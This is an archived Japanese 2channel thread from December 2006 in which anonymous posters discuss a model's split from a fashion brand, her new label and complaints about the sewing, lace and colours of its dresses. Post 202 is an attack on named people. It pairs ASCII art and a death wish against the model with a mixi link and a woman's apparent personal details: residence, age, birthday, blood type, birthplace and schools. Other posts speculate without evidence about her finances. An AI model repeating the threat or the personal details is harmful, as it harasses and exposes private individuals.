確かにディアマンテの時よりはマシになったと思う

188 :無名モデル:2006/12/25(月) 04:01:46 ID:???
ワンピ最低・・・
この金額でこの質って・・・
店舗出来て実物見れるまでやめときゃ良かったよ
オクに出すのも買う人が可哀相すぎて悩む

189 :無名モデル:2006/12/25(月) 07:25:31 ID:???
アンティック・シャイニー・ドレスコート
いずれにしてもオークションでほとんど見かけないけど
大概の人はけっこう納得のいく出来だったんじゃない?

190 :無名モデル:2006/12/25(月) 10:43:58 ID:???
みかちゃん可愛い☆

191 :無名モデル:2006/12/25(月) 11:13:25 ID:AxJcKe6Y
>>189
そうだよね。
なんだかんだいってオクにでてないもんね。

192 :無名モデル:2006/12/25(月) 12:37:01 ID:AxJcKe6Y


193 :無名モデル:2006/12/25(月) 17:36:23 ID:???
この人いつの間にディアマンテやめたの?
やめたことととかJDのHPの方で何も書いてなかったし、
ミカのハニーってリンクいつの間にか無くなってて
ビクーリした。
何かモメたのかね?
妄想を掻き立ててしまう。

194 :無名モデル:2006/12/25(月) 19:13:10 ID:Cnp81VIK
↑いまさら…


釣りか?

195 :無名モデル:2006/12/25(月) 20:59:20 ID:5EfrRqXQ
新作の2ピース可愛いぽいね!


196 :無名モデル:2006/12/25(月) 22:14:32 ID:???
>>194
すまん しばらくJD卒業してたら話題に乗り遅れてしまった。
想像だと
ミカ「ミカ独立したぁぁぁい。」
宮前「この裏切り者っっっ 恩を仇でかえしよって」
ってとこか?



197 :無名モデル:2006/12/25(月) 22:19:21 ID:???
誰も釣られませんよw

春服早く見たいなぁ♪

198 :無名モデル:2006/12/25(月) 22:54:12 ID:???
>>196
マジレスすると似たようなもん
でもそれは原因ではなくあくまで二の次。

ナビオ来年閉館決定→
元々ハニーの値段のこと等でオサーンと揉めがちだったみんのんが辞める決意→
みんのんが辞めるなら私も辞めるとちかちゃん→
ハニーなくなるなら意味がないから辞めるとゆみちゃん→
ナビオ店員残らないならと一足先に撤退させるオサーン(みんのん寿退社を表向き理由に)→
ナビオオワタ→
みんのん新ハニー立ち上げ→
ネット販売開始→
来春ショップオープン ←今ここ

199 :無名モデル:2006/12/25(月) 23:42:08 ID:???
ドレスコート買えなかったけど
春コートもドレスコートと同じデザインだし買うかも

200 :無名モデル:2006/12/26(火) 03:23:35 ID:???
>>198
教えてくれてありがd
ちかちゃんとゆみちゃんはミカちゃんと共にやめたのね・・・
でもミカちゃん今までJDの姉妹ブランド的に活動してたのに
いきなり事業始めたのはすごいね。パトロンでもいたのかしら?
それとも元々JDの時ハニー立ち上げてからパターンナーとか業者と
親しくなっていてある程度準備してたとか?


201 :無名モデル:2006/12/26(火) 06:02:32 ID:wGGqA9I3
みかりん可愛い☆

202 :円光実況中@三十路:2006/12/26(火) 06:04:26 ID:???
    ▲■■■■ ■■[ ●■■■lL       2ちゃんねらーお断り!
     (▲■■■■■ ■人|\■■鬱■\     キモデル三佳死ね
     ■■■■■■■ ■■■■■鬱■|▲、
     ll▲■鬱箒■■F ̄`'''''''''ゞ■■■||■、■   好きな添い寝の仕方は、
'′  l▲■■箒■厂        ''■■■■■)|
   i▲|■■鬱广          `■l■■■■    ほっぺがつくまでずいずいと
   ''■■■■厂           _.._■■■▼
    ■■テ‐二 ̄'       −"_.._ニlllll■l〕   のぼってぴったり張り付く ちょーウザw
   !llll▼「 ..<F''●?+        (●  !) ゙〈▼   
、  {ミlllll[   ''\ `゙゙’               ‖ http://mixi.jp/show_friend.pl?id=7554740
....  ! コlll{            ..ュ        lリ
: `  〉 llllll'、      ..ャー    '''4u.     ‖   名 前 まだ 決めてない
 '  |jil▲l'、      |llL●  ..ォ●)).、   .jlll廴   現住所 東京都杉並区
:  .llll■lll    _〃 " ̄  ` ̄   ゛\ :■jl▲   年 齢 30歳
:   ■■■llョ 、 ''" -ョョョ、   +tl■!   /lll■l■l]'、 誕生日 12月11日
: : : l◆■■鬱llllョ、   ヾll>n=='ニ]ナ  ..llll■l■lll'、 血液型 O型
  l■■■●◆川.   ゙゙゙''ヘ4=F ̄  _jll■ll■l■●〕 出身地 兵庫県三田市
:  l■■■鬱■ll〕`"ゝ、_       _..jl〕■■鬱■■〕 マイミク一覧みっひさん(63) sorairoさん(57) まいさん(43)
   l■■攪鬱■■. ゙゙ゞ======宀 ]■◆鬱鬱◆鬱| ■ ねねさん(1) takuさん(23) 春さん(55)
: : l■■l◆鬱llllll■、        j■◆◆鬱|◆■|▲|
l: : l■■■■鬱■■'、        j■◆◆◆鬱■■) 添い寝が好きすぎて死んだ…(533) 迷子常習犯(8438)
  ■■■■鬱■■■■、       !■■■■箒■■| 顔で笑って心で泣いて(5572) 仕事マゾ(57)
  ■■■鬱■■■■、       !lll■■■■箒■■| 大阪女学院(1295) 年上好き(24250) 龍谷大学(3238)
       キスがスキ(53714) 本人です(15350)

203 :無名モデル:2006/12/26(火) 07:19:01 ID:wGGqA9I3
書き込んで!!

204 :無名モデル:2006/12/26(火) 10:58:53 ID:ao/nBaKQ
>>200
パトロンいたのかな??
でもアンティックは定番にして欲しいな
お金なくて変えなかったこの時期きつかった。

205 :無名モデル:2006/12/26(火) 11:01:33 ID:???
アンティック届いたけど本当に生地が安っぽいし縫製も雑ですごくショックだった 裾や袖が雑すぎでした それにやっぱり胸のライン変わってましたね 前と変わらないって聞いてたけどオフから真っ白になってたのも違和感を感じました

206 :無名モデル:2006/12/26(火) 12:30:35 ID:???
>>184>>188
(・∀・)カエレ!

207 :無名モデル:2006/12/26(火) 13:09:46 ID:???
>>200
JD時代にそうとう金はもらってたんじゃない?
パターンナーとか業者と親しくなっていたのももちろんあると思うし。

208 :無名モデル:2006/12/26(火) 14:13:34 ID:8UNtjRu9
205しつこいで!

209 :無名モデル:2006/12/26(火) 14:15:40 ID:???
いろんな意見あって当然だから。
ほめられないと文句言うなんて、心の狭い。

210 :無名モデル:2006/12/26(火) 14:34:01 ID:???
アンティック届いたけど可愛かった。
よかった〜
彼氏も褒めてくれたよ

211 :無名モデル:2006/12/26(火) 14:48:55 ID:???
私のベージュかわいくない





ばか

212 :無名モデル:2006/12/26(火) 14:50:37 ID:8UNtjRu9
パトロンなんかいるわけないやん あほか?

213 :無名モデル:2006/12/26(火) 14:56:24 ID:???
返品不可って厳しいね。


214 :無名モデル:2006/12/26(火) 15:00:05 ID:???
>>211
なんか素直に・・・
カワウソス(´・ω・`)ショボーン


ベージュは下手するとオバ臭そう。


215 :無名モデル:2006/12/26(火) 15:01:16 ID:???
アンティック可愛く無いって人、今ならサイズと色によってはオクですぐ売れるのでは?
。売り切れて欲しい人たくさんいるみたいだし。
私は黒買ったけど、確かに前のほうが縫製やカットワークはいいと思う。
でもラインは今の方がスッキリしてすきだし、周りの受けも良かったし満足してるよ。

216 :無名モデル:2006/12/26(火) 15:09:08 ID:4BCb6WAb
>>215
本当に周りに受けましたか?
私はベージュ買ったらみんなにセンス悪いって言われてショックでした。
家族にもそんなおばさんみたいな服なんで買ったの?
と言われました。
実際レースも安っぽいし、ラインもいまひとつで私的には最悪でした・・

217 :無名モデル:2006/12/26(火) 15:15:43 ID:???
>>216
私は黒だったからでしょうか?受けよかったですよ。
ディアマンテ嫌いな彼も「想像してたよりは良かった、いいんじゃない?」といってくれましたし。
普段はJD着てるとケチョンケチョンにけなすので逆にそういわれてびっくりした。
家族にも好評で今日は妹に貸してます。
私、胸下から派手に広がるラインは幼児っぽくなるのでこれくらい落ち着いてる方が似合うのかもしれません。
ベージュの色味がもしかしてダメだったのかもですね・・・。
黒だとレースの安っぽさもわからなくなるのかも。

218 :無名モデル:2006/12/26(火) 15:16:36 ID:???
>>216
黒とベージュじゃ随分雰囲気違うんだし、そういう聞き方はどうかと。
アンティックはベ−ジュ買った人に不満が多いね。

219 :無名モデル:2006/12/26(火) 15:19:05 ID:???
新作下着みたい


220 :無名モデル:2006/12/26(火) 15:52:15 ID:ao/nBaKQ
>>219
この流れで笑ってしまった。

オク出さないのはなんでなのーーそれとも
一人出した人だけのモンクなのかな

221 :無名モデル:2006/12/26(火) 17:31:47 ID:???
>>216
私も・・・
こんなことならディアマンテで小悪魔買えばよかったよ
はぁ

222 :無名モデル:2006/12/26(火) 17:56:36 ID:???
ベージュはハズレだったんだね。きっと。
だってあのブログに載ってた髪の黒めの人も似合ってなかったもんね・・・。
髪色が明るい人意外はオバまっしぐらの予感。

223 :無名モデル:2006/12/26(火) 18:00:45 ID:???
髪色じゃないと思うよ
実物見たらわかる
友達と色違いで購入したけど安っぽいつくりで縫製悪いしどれも変だった
店舗出来るまで買わない方がいいと思った

224 :無名モデル:2006/12/26(火) 18:42:02 ID:8UNtjRu9
返品不可能ってアクトクショウホウ

225 :無名モデル:2006/12/26(火) 18:43:53 ID:???
私白買ったら漂泊されたみたいな色でレースもチクチクするし可愛くなくて本当に悲しかった。

226 :無名モデル:2006/12/26(火) 18:45:48 ID:???
オクで偽物?って言われそうなくらいやばいよ。お金は捨てたつもりで近所用にします。
髪色というより実物ほんまにやばいです。コートにしたら良かった。

227 :無名モデル:2006/12/26(火) 19:00:19 ID:HYjdTCPZ
アンティック黒以外ダメだったってことなのかな〜

228 :無名モデル:2006/12/26(火) 19:31:00 ID:???
アンティック黒買ったけど満足してるよ
白もベ−ジュも迷ったけど黒にしてよかった
他の色買った人ゴメン

229 :無名モデル:2006/12/26(火) 21:19:04 ID:xO/PjfoA
>>216
私もベージュ買ったら泣きそうだったよ!
縫製が雑だしレースに品がない。
恥ずかしくて着れないよ・・
>>221
本当、ディアマンテ買った方が良かった。
もうハニーは怖くて買えない

230 :無名モデル:2006/12/26(火) 22:40:16 ID:???
オクにハニー出てきたね

231 :無名モデル:2006/12/26(火) 23:08:40 ID:???
どこに?!
探したけどノベ&ショッパーしか見つからない

232 :無名モデル:2006/12/27(水) 00:00:30 ID:???
みかちゃんKA4LAじゃなくてCA4LAだよ…

233 :無名モデル:2006/12/27(水) 01:02:45 ID:???
私もアンティックの黒だけど
すごく可愛くて合せやすいし満足してる

でもこれだけアンティックの酷評が多い中
ドレスコートとシャインワンピの感想がないのは
買って正解だったってことだよね?

234 :無名モデル:2006/12/27(水) 01:03:38 ID:???
>>232
私も思った
よく英単語もスペル間違えてるし
横文字苦手なんだろうなぁ

235 :無名モデル:2006/12/27(水) 01:08:54 ID:???
>>233
言われてみれば確かにコートとシャインワンピは
全然触れられてないね。
買った人どうだった?

236 :無名モデル:2006/12/27(水) 01:31:34 ID:???
横文字じゃなくあれあて字だよ


237 :無名モデル:2006/12/27(水) 01:36:26 ID:???
私みんのんがブログできてるの見て,ドレスコート白を買ったけど可愛いしお気に入り!
ココ見てたらアンティックは買わなくてよかったのかな…

238 :無名モデル:2006/12/27(水) 02:48:50 ID:8ebd3Waq
胸元のカットもラインも色も前のと違うのに、
何でブログでそーゆーの書かないのかな。
「前のと本当に変わらないです」とか嘘やん。
信用なくすで

239 :無名モデル:2006/12/27(水) 02:59:46 ID:???
質落とさないと金が入らないからじゃん?みかはアンティック旧型だからいいだろうけど

240 :無名モデル:2006/12/27(水) 04:42:03 ID:???
>>238>>239
縫製も生地屋もディアマンテ工場使えないから

241 :無名モデル:2006/12/27(水) 06:42:08 ID:???
ドレスコート、良かったんだ
生地薄いかと思って買うのやめたけど買えばよかった

242 :無名モデル:2006/12/27(水) 09:34:16 ID:???
>>238
あれ?どこかに書いてあったと思うけど…

243 :無名モデル:2006/12/27(水) 10:03:30 ID:???
なんか、みかちゃん高いものかって贅沢してるけど
あたしの買ったあの質の悪いぼったくりワンピの売り上げでか…
ってひねくれた考えしてしまう。もう買う気にならないよ。

244 :無名モデル:2006/12/27(水) 10:14:06 ID:yaE6B0ey
書いてないよ ここの人が気付いたんだよ

前とラインは本当に変わりませんってblogに書いてたし

245 :無名モデル:2006/12/27(水) 10:34:59 ID:???
アンティックワンピ黒買って気に入ってるけど
裏地の丈がちょっと短い気がする
1枚で着たいけどかがんだりすると下着見えそう

246 :無名モデル:2006/12/27(水) 10:49:44 ID:???
http://shmyl.com/nqinson


247 :無名モデル:2006/12/27(水) 12:07:14 ID:???
簑島さんまた全然似合ってない帽子かぶって・・・。
何かもうセンス悪すぎて最近ブログも見る気しなくなってきた。
JDの頃の方が好きだったなぁ。
今は自分の好きなようにスタイリングできるって張り切ってるんだろうけど
実はセンスが悪かっただなんて何かショック。

248 :無名モデル:2006/12/27(水) 12:16:57 ID:???
自分も思った。
なんでかな、JDの時はすんげーーーかわいい!!と思ったのに・・
なんか黒目が小さくなってない?カラコンやめたのかな
あのパーマもヘンだし、みんのんどうしちゃったの


249 :無名モデル:2006/12/27(水) 12:43:48 ID:???
年をとったの。

250 :無名モデル:2006/12/27(水) 14:23:26 ID:1VcHX0fO
小悪魔ワンピ確かにあっちのが
全然可愛い。高いけどネ。

251 :無名モデル:2006/12/27(水) 14:24:08 ID:1VcHX0fO
新作どうなんだろう??

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)